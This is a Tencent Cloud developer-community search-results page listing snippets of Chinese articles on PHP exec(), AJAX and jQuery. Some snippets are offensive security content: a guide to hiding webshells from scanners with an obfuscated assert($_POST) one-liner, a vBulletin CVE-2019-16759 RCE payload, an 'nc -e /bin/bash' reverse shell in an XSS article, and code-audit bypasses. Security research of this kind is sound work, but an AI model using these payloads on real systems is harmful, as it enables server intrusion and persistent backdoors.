PHP exec()命令在代码中可以完美地工作，但在被AJAX调用时却不能 - 腾讯云开发者社区 - 腾讯云

开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

Web安全靶场

> 这段代码的本意是，只考虑让用户在表单中提交一个IP地址，然后由PHP程序通过shell_exec系统调用执行Ping指令，去测试用户提交的IP的是否可以Ping通。...在生产环境中如果出现了类似的情况，我们可以考虑在Web防火墙，对用户提交的表单内容，尝试做一些过滤。...同时可以考虑在PHP程序执行阶段，监控shell_exec执行的其他的新的命令进程，在内存的调用栈变化信息、观察对应生成的火焰图像，给出报警提示。...也同时基于OpenRest Xray的动态跟踪技术，基于云原生语言YSQL等工具，实践了如何发现PHP的命令执行漏洞在被利用时，如何获得PHP执行栈的信息、有对应的CPU火焰图的特征。 ?...DVWA不算很复杂的靶机项目，但足以复现典型的PHP命令执行漏洞。

9594 0

php平滑重启nginx，彻底清除WordPress的静态缓存

这次也一样，所以分享具体方法之前，我先说一下我这次的需求与痛点：一、需求痛点在博客集成了代码版缓存功能之后，为了方便在前台清理页面缓存，我特意写了ajax 清理缓存的功能（相关文章）。...这个功能写好之后确实可以正常工作。...二、执行权限 php 执行 Linux 命令有几个前提条件： ①、php 必须开放一些执行外部命令的函数，比如 exec()、system()等； ②、必须赋予 WEB 启动帐号（比如 www 帐号）执行特殊命令...最后重载 php-fpm 或 php 即可生效，比如 lnmp 环境可以执行 service php-fpm reload 命令。...对于问题②：我们需要在 Linux 中赋予 WEB 帐号使用 sudo 执行指定命令的权限，在这个需求中，我们可以这样做： #编辑/etc/sudoers文件： vim /etc/sudoers

2.1K9 0

您找到你想要的搜索结果了吗？

是的

没有找到

Generator：化异步为同步

但有了Promise就能完美地解决异步问题了吗？并没有。首先，Promise仍然需要通过then方法注册回调，虽然只有一层，但沿着Promise链一长串写下来，还是有些让人头晕。...而且，链中抛出的错误会fail掉后面的整个Promise链，如果要在链中及时捕获并处理错误，就需要给每个Promise注册一个错误处理回调。噢，又是一堆回调！那么最理想的异步写法是怎样的呢？...扯了一堆预备知识，终于可以回到Generator的正题了：普通函数在被调用时，JS引擎会创建一个栈帧，在里面准备好局部变量、函数参数、临时值、代码执行的位置（也就是说这个函数的第一行对应到代码区里的第几行机器码...为便于说明，先上一段直接使用回调的代码： let it = gen(); // 获得迭代器 function request() { ajax({ url: ‘www.someurl.com’,...直到回头弥补了一些计算机基础知识，才最终突破了理解上的障碍，把Generator的来龙去脉想清楚，从而敢应用到实际工作中。所以说，基础是很重要的，这是永不过时的真理。

1.6K7 0

$.ajax()方法详解学习

在工作总是会有很多地方用到异步请求，有时候用快捷方法 get/post 或者getJson不能满足自己的需求，所以必须使用底层的ajax来实现异步请求，每次写完下次在用到的时候就记不清楚了，就在这里记录一下...默认为”GET”请求，例如put和delete也可以使用，但仅部分浏览器支持。（3）timeout：类型: Number 设置请求超时时间（毫秒）。...注意: 设置cache为 false将在 HEAD和GET请求中正常工作。它的工作原理是在GET请求参数中附加”_={timestamp}”（详见ajax防止缓存）。...这个回调函数得到2个参数： jqXHR (在 jQuery 1.4.x中是 XMLHTTPRequest) 对象和一个描述请求状态的字符串(“success”, “notmodified”, “nocontent...如果提供dataType选项，那么这个success选项是必须的，但你可以使用null或jQuery.noop作为占位符。

6.2K1 0

如何优雅地隐藏你的Webshell

：制作免杀webshell 隐藏webshell最主要的就是做免杀，免杀做好了，你可以把webshell放在函数库文件中或者在图片马中，太多地方可以放了，只要查杀工具查不到，你的这个webshell就能存活很长时间...命令执行的方法这里使用我们最常用的php的一句话马来给大家做演示，PHP版本是5.6的，在写一句话马之前我们来先分析一下PHP执行命令方法 1、直接执行使用php函数直接运行命令,常见的函数有(eval...，那么变量也一定能当成字符串赋值给变量，但调用时需要用$$ php $a = "assert"; $c ='a'; $$c($_POST['x']); ? 我们在把这种方法结合到回调函数方法中，可以看到，已经是2级了 <?...,以及那些不需要经常改动的文件…… 8、如果有可能的话,还是审计下目标的代码,然后想办法在正常的代码中构造执行我们自己的webshell,即在原生代码中执行webshell 9、webshell里面尽量不要用类似

1.8K2 1

在线 Python运行工具

与之相比，这次的代码稍有些不同，毕竟昨天的是纯PHP代码之间的处理，而今天则是在PHP和Python之间的耦合。所以需要额外的增加一点处理。 PHP环境设置在编码之前，应该先把PHP环境设置一下。...system函数本身具有打印命令执行输出的功能，也就是说，程序中的输出可在PHP页面中显示。如果程序成功执行，则system的返回值为程序输出的最后一行，如果执行失败，返回false。...虽然它只返回命令结果的最后一行，但用第二个参数array 可以得到完整的结果，方法是把结果逐行追加到array的结尾处。...通过PHP调用外部的Python代码，执行相关脚本。前台通过ajax方式请求代码运行结果，并显示在result页面块上。完整代码 index.php PHP语法，Python语法的意愿，可以和我取得联系。联系方式在左侧的友情链接处可以找到。(^__^) 嘻嘻……

4.1K2 0

php中popen,exec,system,passthru区别

exec() 原型：string exec (string command [, string array [, int return_var]]) exec() 函数与system()类似，也执行给定的命令...虽然它只返回命令结果的最后一行，但用第二个参数array可以得到完整的结果，方法是把结果逐行追加到array的结尾处。所以如果array不是空的，在调用之前最好用unset()最它清掉。...passthru() 原型：void passthru (string command [, int return_var]) passthru() 只调用命令，不返回任何结果，但把命令的运行结果原样地直接输出到标准输出设备上...同样它也可以得到命令执行的状态码。 popen() 上面的方法只能简单地执行命令，却不能与命令交互。...在PHP3中，对这种句柄只能做单一的操作模式，要么写，要么读；从PHP4开始，可以同时读和写了。除非这个句柄是以一种模式（读或写）打开的，否则必须调用pclose()函数来关闭它。

9682 0

php异步执行

开发中遇到了群发邮件慢的问题，找到了以下方法，还不错分享下： PHP异步执行的常用方式常见的有以下几种，可以根据各自优缺点进行选择： 1.客户端页面采用AJAX技术请求服务器优点：最简单，也最快，就是在返回给客户端的...HTML代码中，嵌入AJAX调用，或者，嵌入一个img标签，src指向要执行的耗时脚本。...所以可以通过调用它，但忽略它的输出。使用代码如下： pclose(popen("/home/xinchen/backend.php &", 'r')); 优点：避免了第一个方法的缺点，并且也很快。...3.CURL扩展 CURL是一个强大的HTTP命令行工具，可以模拟POST/GET等HTTP请求，然后得到和提取数据，显示在"标准输出"（stdout）上面。...代码如下： $ch = curl_init(); $curl_opt = array(CURLOPT_URL, 'http://www.example.com/backend.php',CURLOPT_RETURNTRANSFER

4K12 0

jQuery 教程

"> jQuery 使用版本我们可以在浏览器的 Console 窗口中使用 $.fn.jquery 命令查看当前 jQuery 使用的版本： jQuery 语法通过...jQuery 代码... }); 这是为了防止文档在完全加载（就绪）之前运行 jQuery 代码，即在 DOM 加载完成后才可以对 DOM 进行操作。...您可以在我们的 jQuery Ajax 参考手册学会 jQuery Ajax 的具体应用。您可以在我们的 AJAX 教程中学到更多有关 AJAX 的知识。...jQuery load() 方法 jQuery load() 方法是简单但强大的 AJAX 方法。load() 方法从服务器加载数据，并把返回的数据放入被选元素中。...“demo_test_post.php” 中的 PHP 脚本读取这些参数，对它们进行处理，然后返回结果。第三个参数是回调函数。第一个回调参数存有被请求页面的内容，而第二个参数存有请求的状态。

21.1K2 0

一起来学PHP代码审计 | 新手入门篇

根据不同编程语言的特性，及其历史上经常产生漏洞的一些函数，功能，把这些点找出来，在分析函数调用时的参数，如果参数是用户可控，就很有可能引发安全漏洞寻找漏洞前准备理解现在的cms大致可分为两种，单入口模式和多入口模式...2、搜索一些经常产生安全问题的函数，比如执行数据库查询的函数，执行系统命令的函数，文件操作类函数等等，在通过回溯这些函数在被调用时参数，判断参数是否我们可控，进而定位漏洞点。...起移除）安全模式下执行程序主目录:safe_mode_exec_dir = /var/www/html如果php使用了安全模式，system（）和其他程序执行函数将拒绝启动不在此目录中的程序。...只能设置在php.ini中。...> PHP代码执行函数总结 PHP中可以执行代码的函数，常用于编写一句话木马，可能导致代码执行漏洞，这里对代码执行函数做一些归纳。

2.5K1 0

wakeonlan! 树莓派远程开机

我用的是frp，但本教程并不包含内网映射实现远程开机是通过一个软件，你可以用以下命令下载它 apt-get install wakeonlan 使用 # wakeonlan -i [广播地址...的网页，执行了wakeonlan这条命令需要用exec函数去执行，如果没成功，很可能是因为这个函数比较危险，在php.ini里是被禁用了解除禁用你得找到php.ini，搜索disable_functions...，把exec或者你需要用的函数删掉，这样OK了下面是部分PHP的源码，我也加了个密码保证只有我自己能开机，exec具体怎么用还请看官方文档 if(!...($shell, $result, $status); // 也可以直接 // exec('wakeonlan -i 192.168.1.255 FF:FF:FF:FF:FF:FF');...} 全部代码 <?

1.6K2 0

CVE-2019-16759：vBulletin 5.x未授权RCE复现

本文作者：CreaT0ye（Timeline Sec核心成员）本文共562字，阅读大约需要2分钟 0x00 简介 ---- vBulletin是一个收费低廉但强大的建站BBS(论坛)CMS，该CMS...近日，vBulletin 5.x爆出一个前台远程代码执行漏洞,无需登录即可触发。该论坛程序在国外的国外的用户量就类似dz论坛在国内的用户量。...0x01 漏洞概述 ---- 漏洞通过请求ajax/render/widget_php进行模板注入触发代码执行。...访问/index.php?routestring=ajax/render/widget_php会显示以下结果 ?...然后POST如下数据即可执行命令whoami widgetConfig[code] = echo shell_exec('whoami'); exit; ?

1.9K2 0

关于怎么使用 webhooks 自动部署博客，详细教程文档！

，其实也就是调用你三个负载均衡的站点提供的 URL，来通知你现在这个代码库有最新更新的代码，你可以在收到 URL 的调用通知以后，通过 git pull 命令把最新上传的网站代码，拉取到服务器上。...环境安装安装 Git 需求：在站点接收到 webhooks 回调时，使用 git pull 拉取网站代码，所以需要安装 git 命令：yum -y install git 验证： [root@CodeGuide...模块以后，还需要对 PHP 的 php.ini 进行更改，删除 disable_functions 下的 exec、shell_exec，这样才能在 webhooks.php 文件中，执行脚本命令。...'done'; 在我们从 Github 克隆下来的代码文件中，有一个名为 webhooks.php 的文件，它是用于处理 Github 回调时拉取 Github 对应博客代码库的脚本文件。...六、部署验证目前，访问博客是这样，如下：接下来我们开始修改博客文件并提交，验证自动部署更新站点 1. index.php 新增代码你可以在 index.php 文件中修改任意内容，或者添加新的内容

3.4K1 0

PHP代码审计-eyoucms

环境搭建：代码审计： 1.命令执行漏洞: 通过路由找到对应代码这里需要传入三个参数，而最后的content则是我们需要填写的内容，在代码93行处存在过滤发现对content的内容进行了限制...> 3、内容中不能有 {eyou:phpxxx 4、内容中不能有 {php xxx 这里我们可以通过 <?= 的形式进行绕过漏洞复现：在代码底部插入exec('whoami'); 2.任意URL跳转在 user->Users.php->logout() 函数中存在一个可以传入的 referurl 参数，该参数通过input()函数的过滤后...但这里却不能删除.php文件，具体大家可以看代码656行，在代码653行存在一定的判断条件，如何删除的文件中没有phar协议且必须要uploads路径，可以绕过。...在application/api/controller/Ajax.php:219 get_token函数是可以前台随意调用的，另外形参中的$name变量也是通过http传递进来的。

1.1K2 1

jQuery

AJAX & ASP/PHP/DB/XML 一、基本概念 1....基本语法 $(selector).action() 文档就绪函数所有 jQuery 函数位于一个 document ready 函数中，为了防止文档在完全加载（就绪）之前运行 jQuery 代码。...回调函数由两个参数：被选元素列表中当前元素的下标i，以及原始（旧的）值origText，返回return函数新值。...这意味着可以在不重新加载整个网页的情况下，对网页的某部分进行更新。方法描述 open(method, url, async) 规定请求的类型、URL 以及是否异步处理请求。...AJAX & ASP/PHP/DB/XML 通过标签绑定事件，绑定函数在服务器响应就绪时调用函数，发送HTTP请求，访问asp/php文件，文件中对数据库进行查询。

18.3K2 0

从瑞士军刀到变形金刚--XSS攻击面拓展

Cross-Site Scripting（XSS）可以窃取cookie，模拟admin请求，但事实上在复杂环境下，我们可以使用XSS完成复杂的攻击链。...我们插入的alert(1)被当作正常的js代码执行了让我们回到之前的测试环境中我们可以通过一个漏洞点执行我们想要的js代码。...=`nc localhost 5855 -e /bin/bash`;'; 但正如XSS漏洞存在的意义，getshell或者rce本身都很难替代xss所能达到的效果，我们可以配合php的代码执行，来继续拓展...这个插件本身是一个非常特殊的插件，在启用情况下，这个插件会被各个页面所包含，但细心的朋友可能会发现，在前面的攻击过程中，由于我们不遵守插件的页面格式，页面内容被替换为php phpinfo();?...2、通过代码混淆等方式，将代码混淆入原本的代码中，避免安全类防御工具在站内扫面时发现此页面。

8421 0

编程日记：PHP实用函数记录（二）

; 连接闭包和外界变量的关键字：USE，闭包可以保存所在代码块上下文的一些变量和值。PHP在默认情况下，匿名函数不能调用所在代码块的上下文变量，而需要通过使用use关键字。命令行下的PHP 在php命令行下执行.php文件时，执行环境的工作目录是php命令程序（php.exe）所在目录，所以如果想在文件内使用相对路径时，要先切换当前的工作目录才行。...$return_var，命令执行后的返回状态，命令执行成功值是0 返回值， shell命令输出的最后一行注意：在 Windows 下，exec() 函数会先启动 cmd.exe 来执行指定的命令。...=php_com_dotnet.dll 然后在php.ini中开启，com.allow_dcom = true 之后就可以使用new COM进行操作了。...PHP 将尝试将反引号中的内容作为 shell 命令来执行，并将其输出信息返回（即，可以赋给一个变量而不是简单地丢弃到标准输出）。 <?

1.1K2 0

Thinkphp 反序列化利用链深入分析

环境搭建 Thinkphp 5.1.35 php 7.0.12 漏洞挖掘思路在刚接触反序列化漏洞的时候，更多遇到的是在魔术方法中，因此自动调用魔术方法而触发漏洞。...但如果漏洞触发代码不在魔法函数中，而在一个类的普通方法中。并且魔法函数通过属性（对象）调用了一些函数，恰巧在其他的类中有同名的函数（pop链）。...自 PHP 5.4.0 起，PHP 实现了一种代码复用的方法，称为 trait。通过在类中使用use 关键字，声明要组合的Trait名称。所以，这里类的继承要使用use关键字。...我们不止一次在Thinkphp的rce中见到这两个方法。可以在/thinkphp/library/think/Request.php，找到一个__call函数。...在Thinkphp的Request类中还有一个功能filter功能，事实上Thinkphp多个RCE都与这个功能有关。我们可以尝试覆盖filter的方法去执行代码。代码位于第1456行。

9033 0

干货 | 命令执行漏洞和代码执行漏洞详解

命令执行（RCE）漏洞和代码执行漏洞区别如下: 代码执行实际上是调用服务器网站代码进行执行命令执行则是调用操作系统命令进行执行一、命令执行漏洞 1、什么是命令执行命令执行（Remote Command...Execution, RCE） Web应用的脚本代码在执行命令的时候过滤不严从而注入一段攻击者能够控制的代码,在服务器上以Web服务的后台权限远程执行恶意指令成因代码层过滤不严系统的漏洞造成命令注入...调用的第三方组件存在代码执行漏洞常见的命令执行函数 PHP：exec、shell_exec、system、passthru、popen、proc_open等 ASP.NET：System.Diagnostics.Start.Process...内部缓冲区的内容可以用 ob_get_contents() 函数复制到一个字符串变量中想要输出存储在内部缓冲区中的内容可以使用 ob_end_flush() 函数另外，使用 ob_end_clean...在进入执行命令函数/方法前，变量要做好过滤，对敏感字符转义在使用动态函数前，确保使用的函数是指定的函数之一对PHP语言，不能完全控制的危险函数就不要用

6.8K6 3

Thinkphp 反序列化利用链深入分析

环境搭建 • Thinkphp 5.1.35 • php 7.0.12 3. 漏洞挖掘思路在刚接触反序列化漏洞的时候，更多遇到的是在魔术方法中，因此自动调用魔术方法而触发漏洞。...但如果漏洞触发代码不在魔法函数中，而在一个类的普通方法中。并且魔法函数通过属性（对象）调用了一些函数，恰巧在其他的类中有同名的函数（pop链）。...自 PHP 5.4.0 起，PHP 实现了一种代码复用的方法，称为 trait。通过在类中使用use 关键字，声明要组合的Trait名称。所以，这里类的继承要使用use关键字。...我们不止一次在Thinkphp的rce中见到这两个方法。可以在/thinkphp/library/think/Request.php，找到一个__call函数。...在Thinkphp的Request类中还有一个功能filter功能，事实上Thinkphp多个RCE都与这个功能有关。我们可以尝试覆盖filter的方法去执行代码。代码位于第1456行。

1.6K4 0

点击加载更多

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭